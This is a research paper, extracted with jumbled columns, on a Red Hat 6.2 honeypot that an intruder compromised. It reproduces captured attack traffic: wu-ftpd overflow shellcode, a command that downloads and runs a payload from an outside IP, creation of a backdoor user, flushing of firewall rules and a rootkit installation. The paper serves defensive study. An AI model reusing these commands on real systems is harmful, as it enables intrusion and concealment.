Documente Academic
Documente Profesional
Documente Cultură
Abstract
Honeypot in computer security is an emerging technology. Any networked computer would attract hackers that intentionally would
like to gain unauthorized access to it. A honeypot system is meant to be hacked in order to learn from it, or merely as a deception
mechanism. Within this research, we deployed several sets of honeynet architecture consisting of several Operating Sytems as the high
interaction honeypot which is connected to the internet via TMNet Streamyx Home DSL connection and monitored by a monitoring
station that used Snort IDS. Among all the high interaction honeypots deployed, the redhat 6.2 honeypot is among the most interesting
honeypots because it is one of the honeypots that has been successfully penetrated by a hacker who then abused it to launch other
attacks against other hosts. The honeypot also has been used as a bot server for several IRC channels. This paper discusses the detail
of the hacker’s activity within the deployed honeypot.
RESEARCH PAPERS
Keywords: high interaction honeypot, honeynet, buffer overflow in Redhat 6.2
the data control (firewall) system. Removing the data control eliminates the possibility of the monitoring station generating
REVIEW PAPERS
requires the honeypot operator to monitor their honeypot from any traffic that could alert any attacker about its presence.
time to time to avoid abuse. But the removal of the data control
RESEARCH
Internet
Ethernet Hub
Ethernet
C
7 8 9 101112
A 123456 1x 2x 3x
A
4x 5x 6x 1x 2x 3x
B
4x 5x 6x Honeypot
Windows XP
Registry Modified No IP
Sniffer Server
monitoring/analys is
Snort (IDS)
Ethereal (Network packet Collector)
MySQL (alert database)
ACID (data interpreter)
The network traffic is collected by ethereal. The format of the To simplify detection, an IDS is installed. Snort IDS is chosen
network traffic saved by ethereal is in the standard tcpdump as the IDS software for this setup. Snort is a lightweight
format. Tcpdump is the de facto format to store network traffic network intrusion detection system developed by Martin
[5]
. Roesch. It is based on the libpcap packet capture library
commonly used in many TCP/IP sniffers and analyzers. Snort is
a rule-based network IDS. Snort rules consist of known attack
RESEARCH PAPERS
Table 1: Duration of honeypot uptime
as long as possible to get more accurate data. However the setup
Start Stop Date Length IP
may stop due to certain reasons such as blackouts, internet
Date assigned
service downtime by ISP, and abuse by attackers.
Redhat 2003-12-19 2003-12-23 4 days 219.95.189.
6.2 49
The data collection process begins as soon as the setup is
connected to the internet. Any network traffic into and from the
Redhat 6.2 is the 3rd honeypot and the shortest running honeypot
honeypot is recorded in tcpdump format by ethereal.
with 4 days from 2003-12-19 until 2003-12-23. As stated in the
Simultaneously the process of identifying possible intrusions is
methodology, the honeypot will be connected to the DSL
done by snort IDS software. Any attack detected is logged and
connection uninterrupted for as long as possible in order to get
transacted to the mySQL database.
the most data (which will result into a more accurate statistic)
Other than these two data collection processes, the forensic
unless stopped by some reason. In this case, the Redhat 6.2 was
analysis of the compromised honeypot will also contribute to the
immediately stopped after we detected that it was being used as
a stepping stone to do reconnaissance activity (port scanning).
5. REDHAT 6.2 HACKER’S ATTACK servers, launch IRC bot servers, and broadscan smurf attacks.
OBSERVATION AND DESCRIPTION The complete activity is profiled in the attack description
section.
5.1. Overview
5.2. Supporting data
The Redhat 6.2 honeypot has been hacked within the first day.
The attacker entered the server using the buffer overflow The next table shows partial data extracted from the tcpdump file
technique towards wu-ftp server version 2.6.0. After showing how the attacker gained entry into the server via ftp
successfully adding a username and installing a rootkit (a set of server buffer overflow. The data is captured by using ethereal as
programs that replace most common system programs in favour the attacker is using clear text communication format (ftp, telnet,
of the attacker and automatically erase log files to hide their irc) for the intrusion and abuse processes. The most unimportant
presence) the attacker used the honeypot as his base to launch data was snipped (shown as “(snipped)”) as the whole set of
several attacks and reconnaissance activities. Some of them data is too long. Some explanations are provided on the sideline.
included actively scanning the internet to find vulnerable ftp
PASS mozilla@
Buffer overflow- Flooding the
tQ
-____P‰áj_X‰ÂÍ€ë_1Û÷ãþÊYj_XÍ€ë_èíÿÿÿ: File name too long.
CWD ~/{.,.,.,.}
(snipped)
RESEARCH PAPERS
CWD ~{
sP
3Û÷ã°F3ÉÍ€jT‹Ü°'±íÍ€°=Í€R±_hÿ../Dâø‹Ü°=Í€XjTj(XÍ€j
X™Rhn/shh//bi‰ãRS‰áÍ€ncftpget -u xlogicus -p dupa16ani 206.253.222.88 .
'xlogic.tgz';tar zxvf xlogic.tgz;cd xl;./install;
w
12:37am up 2 days, 16:17, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - Fri 8am 2days 0.43s 0.33s -bash
/usr/sbin/adduser raul
firewall rules
passwd raul
a
a
Changing password for user raul
passwd: all authentication tokens updated successfully
/sbin/ipchains -F
/sbin/iptables –F
The next data extracted with ethereal shows telnet communication initiated after the previous entry.
This telnet shows the attacker downloading a rootkit from a geocities ftp account then installing the rootkit.
ftp -v 66.218.65.72
Connected to 66.218.65.72.
220-Welcome to the Yahoo! Web Hosting FTP server.
Connecting to
220-http://help.yahoo.com/help/us/webhosting/gftp/
220-
server
containing rootkit
Using binary mode to transfer files.
(snipped)
Retrieve file ---> RETR raul.tgz
150 Opening BINARY mode data connection for /r0bb1_sev/raul.tgz (438592 bytes).
(snipped)
./setu./setpup
(snipped)
[0m
[0;32mStarting Rootkit Instalation .... [0m
[1;31mMakeing Home Directory And Copying Programs ... [0m
[0;32msniffer ... [0m
[0;32mcuratare ... [0m
[1;31mDone With Directorys & Programs ... [0m
[1;31mRemoveing Original Files ... [0m
[1;31mAnd Replaceing With Ours ... [0m
ls: /usr/bin/socklist: No such file or directory
Rootkit installation process
It is also interesting that the honeypot has been used as a IRC :Stere-!~Stere@Hydden.users.undernet.org PRIVMSG
#NOVAmusic :de unde sa am mah
bot server. The bot joined several channels like #NovaMusic, :Stere-!~Stere@Hydden.users.undernet.org PRIVMSG
#sock, #socklist, #selekt and lots more. The data shows irc #NOVAmusic ::)
communication in several channels. The language of the :Stere-!~Stere@Hydden.users.undernet.org PRIVMSG
communication is unknown but it is believed to be Romanian, as #NOVAmusic :parca nu stii
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic
searching the web with the irc communication phrases returns :16 are
several Romanian sites. The data in the appendix shows the :ryz!~ryz@ryz.users.undernet.org PRIVMSG #Reject
initial connection and communication recorded of the bot : ACTION m-a ferit de foc si apa am s-o iubesc viata
connection to the IRC server. toata m-a ferit de ce a
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG :FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG
#NOVAmusic :lasama sa vb cu Stere- #NOVAmusic :lolz
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG
:loool #NOVAmusic :ba nexa
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG
:are multi ma Stere- #NOVAmusic :ce esti bulangiu
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG :baiatu!~Yo@NeXa.users.undernet.org PRIVMSG
#NOVAmusic ::)) #NOVAmusic :da FrIZz
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG
:stai asa ca`ti zic yo cati are #NOVAmusic :zi adevaru ca am 1 2 sau 3
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG :baiatu!~Yo@NeXa.users.undernet.org PRIVMSG
#NOVAmusic :ll #NOVAmusic :lol
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG :baiatu!~Yo@NeXa.users.undernet.org PRIVMSG
#NOVAmusic :lol #NOVAmusic :asa sunt yo ma
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG :baiatu!~Yo@NeXa.users.undernet.org PRIVMSG
#NOVAmusic :nexa #NOVAmusic :nu nu
RESEARCH PAPERS
6. HACKING TO ABUSE PROCESSES DISCUSSION
5.3. Other Observations
Figure 3 shows the summary of the Redhat 6.2 hacking towards
abuse processes.
5.3.1. Detection
Initial detection was through SNORT and extensive outbound
6.1. Reconnaissance/Scanning Gaining Access
connections initiated from the honeypot. However, the analysis
Escalating Privileges & Covering Tracks
concentrates on the network packets collected by ethereal in
The source sends TCP SYN Scan to determine whether the
tcpdump format, as all the attacker’s activities are recorded
targeted host uses a vulnerable FTP host (like ours). It then
there. Most data is extracted via ethereal.
buffer overflows the server, installs some script downloaded
from 206.253.222.88 and adds the user name raul into the
5.3.2. Source of attack
system. The source of the attack is a computer from India (based
The IP that is initially used in the attack is 203.197.136.8. The
on the source IP). From the speed of the overall initial process,
query at APNIC shows that the IP address belongs to an ISP
it is believed that the attacker used automated tools for scanning
company in INDIA. The next source IP that the attacker used to
and gaining the first entrance.
log in using the telnet program is 213.233.97.236. The search
A few hours later, the attacker logs in (from a computer in
shows that the IP belongs to an ISP in Romania.
Romania) with the username that its tool has previously created
for him using the telnet protocol (which enables us to monitor
This further supported theory that the attacker uses several bases
his activity due to telnet’s clear text protocol). After that the
as launch pads from all over the world to cover his tracks and
attacker downloads and installs a rootkit from a paid webhosting
preserve his anonymity. Intruders usually keep several
account with Yahoo. It is not known whom this account belongs
computers under their control, called step through hosts, from
to, as there is some possibility that the account is a stolen
which they access other computers [7].
account (researcher’s attempt to access the account with the
same username and password a few days later failed). The
5.3.3. Evidence of Active Targeting
rootkit replaced most system files and deleted log files to ensure
As the attacker used only ftp related exploits to gain entry, and
its invisibility.
coupled with the fact that the honeypot has an ftp server, this
shows active targeting. Furthermore the honeypot then sends an
email stating the honeypot’s info to the hacker’s email.
The Redhat 6.2 honeypot has been hacked within its first day
online. Even though Redhat 6.2 is an outdated operating system,
the danger is not limited to the OS alone [13]. It is shown that
attackers will exploit vulnerable software to gain entry to their
target host.
The only reason they still used an old exploit is because it still
worked (which means old systems with known vulnerabilities
still exist). Firewall implementation can help to eradicate
unwanted traffic. Users must always update their systems and
disable any services that they do not need.
8. REFERENCES
7. CONCLUSION